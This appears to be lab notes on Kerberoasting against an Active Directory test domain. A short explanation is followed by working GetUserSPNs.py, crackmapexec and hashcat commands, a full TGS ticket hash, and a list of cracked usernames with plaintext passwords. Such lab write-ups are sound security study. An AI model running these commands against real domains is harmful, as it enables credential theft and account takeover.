Kerberoasting

Kerberoasting is a post-exploitation attack technique that attempts to crack the password of a service account within the Active Directory (AD).

In such an attack, a hacker impersonating as an account user with a service principal name (SPN) requests a ticket, which contains an encrypted password, or Kerberos. (An SPN is an attribute that ties a service to a user account within the AD). The adversary then works offline to crack the password hash, often using brute force techniques.

Once the plaintext credentials of the service account are exposed, the adversary possesses user credentials that they can use to impersonate the account owner. In so doing, they appear to be an approved and legitimate user and have unfettered access to any systems, assets or networks granted to the compromised account.

GetUserSPNs.py -request -dc-ip 192.168.56.11 north.newyork.local/claudio.ortiz:babyboy -outputfile kerberoasting.hashes

also do that with cme with the following command

crackmapexec ldap 192.168.56.11 -u claudio.ortiz -p 'babyboy' -d north.newyork.local --kerberoasting kerberoasting.hashes

let’s try to crack the hashes

hashcat -m 13100 --force -a 3 '$krb5tgs$23$*elena.Lopez$NORTH.NEWYORK.LOCAL$north.newyork.local/elena.Lopez*$8b765ed876f3d1a0159b4d10bbbbaf27$113f9830edd8a28bb7fb48b5e6806f87b01c7e28c3210afec733bc174b05085c2eca711ceaa3d017f3a2f05fa935ddd04a974e4071e41245c082ef7585a14f8e3d7159edde4eed84d96f41f78161e5650c66945e37d3449000018244d0dc6537bc52c51522d3db3241d953a1ce0b3f46bb18d0ccee8b3e604956a8c495ed46e156a77f9e4af0951fd1dda438daf0f644529199fbcf3d6fbb504957801b7e6b38a043fd6b57d145908f9966462594f52d45f1d38694703d007a8163540ed62d0295f0fdef81e4c593e6e2b175e614fe88c682855d51bbfb18af7a42b043cae766c6ed81ab5e7e7c6e7a483e242214d2b02a2d3289b287da82fff03287e83f88c10029f0b5e842075d1c85eef1dabbaf57ba7981c9cfbbbed0828cd44d3ff8a26bf9e44da2dfe03ee15964991f909dc5e4fe1f403ce5fe33047b3e14c96e1e0a0970bed9dc00d8fe05afde0b5a7fb03b073b3ffe03c941d7c48b1f79d7dadade71307720db11f3d1f8471258dc78d7aaac5052f49082cc6519e4ff52aa62460c16413a18b8dc02c3a39bbc5daf96ca3694142934595bad6c69b06850361d7df6f4d1894fe65e2ab3373bcdc99209d508e8729fe780420ad6c911c52fd4a8ab33d07413869cbf7899b9ff63ea7b2a7014af0c33eeba0747e61eb23a9d0b4b49c577b0f94200c9520a176a85cc8f0348ba7150803d00fb37b401e54a9677b16a375cbc601fce688f571f4ac682a4c76b761a4104152e23d9cf207589b8e00c9243fb885b63eefcf0c6b239e8c463700918f3062c4661503bcd1d1406ced43dd8b69c5eae0c1a36d91866738efb5e1a11952a796bf337c05e6eed00f514fd8a8e46f7ce168496383a8b09cc338719e066ea8f99e298fe114dc614d7a463e279bb0859ae1cff661249881324114049fe89ed8e634812468c3b04b5a9f99cca7ce2e07e3acc8c1660e06cbb55f0f00ca6c0bce0da229e4065aea9699479deadfa57311352d3fcbfc3905c5ddbdcab0a66c0ce4d5ab3ea4dfface2fd8094862303609e61a35ef80d2dce899f83f06de349287e4659bc2b8d7dda5684c9416a45031ea912414fbc6d8e976b3f5bde5e2acb20b55bbd5ee1fd1068e6d5eb77bc5bd6200e4aba6e3afdbd243f31ea885cb5b5ec1ecb8d7ad21e89b7634cb8bfbac0f1940c75a02f1fe3acc0c8cb877ecb83663647a5dc47cc9c3b52beff1f4ffdcbb2d2729a4f4425afcaa07474b4dfefab0544cf7fa74685bc1f9ee2fbb049a77838532a83876f785894b0a3f87b1ff9636a44d2c17966a98f0237679ad383f1a23c3c3f293c662db7ee398c6c1d268e0459238154ec4564df774fe11d140adebe3c09e385cd3af7ec1e1cd601fa20226f9c2fcfc19301c4c058d849c74b0b3137a91da6a7c65a53f654eacaa48f815c9aaed533e26b5cc16894938703464a8c72a45f58000ae2a5e403a1e54fc18320b872305d399c' rockyou.txt

miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
pacofish = pacofish
elena.lopez = princesa1